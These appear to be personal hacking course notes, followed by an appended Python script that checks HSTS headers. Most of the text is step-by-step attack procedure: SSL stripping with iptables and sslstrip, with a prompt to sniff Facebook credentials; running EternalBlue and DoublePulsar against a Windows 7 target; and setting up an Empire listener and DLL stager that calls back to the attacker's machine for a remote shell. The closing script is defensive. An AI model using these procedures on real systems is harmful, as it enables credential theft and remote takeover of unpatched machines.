- SSL Stripping
- -------------
- SSL -->> Secure Sockets Layer --> protects data by encrypting it.
- Used in HTTPS
- s --> Secure --> SSL
- We use 3 commands to perform SSL stripping.
- 1. Enable IP forwarding
- $ more /proc/sys/net/ipv4/ip_forward
- 0
- $ echo 1 > /proc/sys/net/ipv4/ip_forward
- $ more /proc/sys/net/ipv4/ip_forward
- 1
- 2. Redirect the HTTP traffic (port 80) to a different port, 8080
- $ nano /etc/ettercap/etter.conf
- LINUX
- IPtables
- iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport
- $ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
- 3. Start SSL stripping
- $ sslstrip -l 8080
- https://www.facebook.com
- https
- HSTS
- ****Try sniffing Facebook's credentials using sslstrip2
- Xerosploit
- ----------
- https://github.com/LionSec/xerosploit.git
- Eternal Blue
- ------------
- EternalBlue Documentation
- -------------------------
- Download Python 2.6 from the link ----> https://www.python.org/download/releases/2.6/
- After installing Python you need to add its path to the environment variables
- "Right click" on "My Computer"
- "Click" on "Properties"
- Go to the "Advanced" tab
- "Click" on "Environment Variables"
- Under the "System variables" table ----> under the "Variable" column
- Select "Path" and click on "edit"
- Type the following
- ;C:\python26\;C:\python26\scripts\;
- click "OK"
- click "OK"
- click "OK"
- Restart your computer
- Download PyWin32 v2.12 from the link below ----> Remember, it will offer many versions; just download pywin32-212.win32-py2.6
- https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
- After installing it, restart your computer
- Download a text editor that also shows line numbers.
- Notepad++ --> https://notepad-plus-plus.org/download/
- Download shadowbroker Project from the link ---> https://github.com/misterch0c/shadowbroker
- Extract the shadowbroker project.
- Copy it in C:\ drive.
- Go to C:\shadowbroker\windows
- 1. There will be a file fb.py
- Open the file in a text editor.
- Go to line 72 and comment it out by putting # at the start of the line
- save the file and exit.
- 2. There will be a file, Fuzzbunch.xml
- Open that file too in a text editor
- Go to line 19 ---> change the path to C:\shadowbroker\windows\Resources
- Go to line 24 ---> change the path to C:\shadowbroker\windows\logs
- Open command prompt and type
- cd C:\
- cd shadowbroker\windows
- python fb.py
- It will launch the shadowbroker python script
- Default Target IP Address ---> IP Address of Windows 7 ------> hit enter
- Default Callback IP Address ---> IP Address of windows xp -----> hit enter
- Use Redirections ----> type "no" ------> hit enter
- ---> hit enter
- Project[0]:0 ---> select from the list-----> 0 to create a new project ---->hit enter
- Give the project name ---> hit enter
- Type "yes" and hit enter
- On the screen it will show
- fb>
- Now type the following
- fb> use eternalblue -----> hit enter
- type "yes" ---> hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- type "1" ---> hit enter
- type "1" ---> hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- It will start our eternalblue plugin and will ping backdoor in windows 7. After many many lines, it will show Eternalblue Succeeded.
- Open Kali Linux machine
- -----------------------
- Download Empire project from the link -----> https://github.com/EmpireProject/Empire
- Extract and copy Empire project on the desktop.
- Open the terminal, type the following
- cd Desktop
- cd Empire
- cd setup
- chmod 777 install.sh
- ./install.sh
- This will install all the basic libraries for Empire.
- python setup-database.py
- cd ..
- chmod 777 empire
- ./empire
- It will start the Empire project, which will help us set up the listener and create the DLL file for getting access to Windows 7
- It will show the following on the terminal
- (Empire) >
- (Empire) > listeners
- (Empire: listeners) > uselistener http
- (Empire: listeners/http) > set Name Eternal
- (Empire: listeners/http) > set Host http://<kali linux IP Address>
- (Empire: listeners/http) > set Port 8080
- (Empire: listeners/http) > set execute
- It will start listening on http://<kali IP Address>:8080
- (Empire: listeners/http) > back
- (Empire: listeners) > list
- (Empire: listeners) > usestagers windows/dll Eternal
- (Empire: windows/dll) > set Arch x64
- (Empire: windows/dll) > execute
- It will create a DLL file named launcher.dll at /tmp/launcher.dll
- Our Kali Linux machine will start listening on port 8080 for any reverse connection, which will be executed by the launcher.dll file
- Copy and paste launcher.dll file in windows xp
- Go back to windows xp again, the same terminal which we left opened
- fb Special (EternalBlue) > use Doublepulsar ---> hit enter
- type "yes" ----> hit enter
- hit enter
- hit enter
- type "0" ----> hit enter
- type "1" ----> hit enter
- type "2" ----> hit enter
- complete path of launcher.dll file ----> hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- hit enter
- type "yes" ----> hit enter
- It will start executing launcher.dll in the windows 7 machine.
- After many many lines it will show Doublepulsar Succeeded
- Goto Kali linux machine, in the empire shell terminal, it will show
- (Empire: windows/dll) > Initial agent ****** from <windows 7 IP> now active
- (Empire: windows/dll) > agents
- (Empire: agents) > interact <agent name>
- (Empire: <agent name>) > sysinfo
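
Added example (not part of the original notes): the SSL stripping section above mentions HSTS next to the facebook.com test. This Python check parses a site's Strict-Transport-Security header and reports what still leaves visitors open to an HTTPS-to-HTTP downgrade; the function names, the one-year threshold and the sample headers are assumptions of this example.

```python
import re

MIN_MAX_AGE = 31536000  # one year; threshold chosen for this example (assumption)

def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797, section 6.1).
    Returns a dict, or None when the header is invalid and must be ignored."""
    seen = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        name = name.strip().lower()          # directive names are case-insensitive
        if name in seen:                     # a repeated directive invalidates the header
            return None
        seen[name] = arg.strip().strip('"')  # values may be quoted strings
    if not re.fullmatch(r"\d+", seen.get("max-age", "")):
        return None                          # max-age is required and must be digits
    return {"max_age": int(seen["max-age"]),
            "include_subdomains": "includesubdomains" in seen,
            "preload": "preload" in seen}

def stripping_exposure(scheme, sts_value):
    """Return the reasons a browser could still be downgraded to plain HTTP."""
    if scheme != "https":
        return ["HSTS sent over http is ignored by browsers"]
    if sts_value is None:
        return ["no Strict-Transport-Security header"]
    policy = parse_hsts(sts_value)
    if policy is None:
        return ["malformed header, browsers ignore it"]
    issues = []
    if policy["max_age"] == 0:
        issues.append("max-age=0 removes the policy")
    elif policy["max_age"] < MIN_MAX_AGE:
        issues.append("max-age below one year")
    if not policy["include_subdomains"]:
        issues.append("subdomains not covered")
    if not policy["preload"]:  # preload is a browser-list convention, not RFC 6797
        issues.append("no preload directive, first visit stays strippable")
    return issues

if __name__ == "__main__":
    # Constructed sample responses, not captured from any real site.
    for scheme, sts in [("https", "max-age=63072000; includeSubDomains; preload"),
                        ("https", 'max-age="600"'), ("https", None)]:
        print(scheme, repr(sts), "->", stripping_exposure(scheme, sts) or "no findings")
```

An empty list means the header gives a returning browser nothing to downgrade; whether the domain is actually on a browser preload list has to be checked separately.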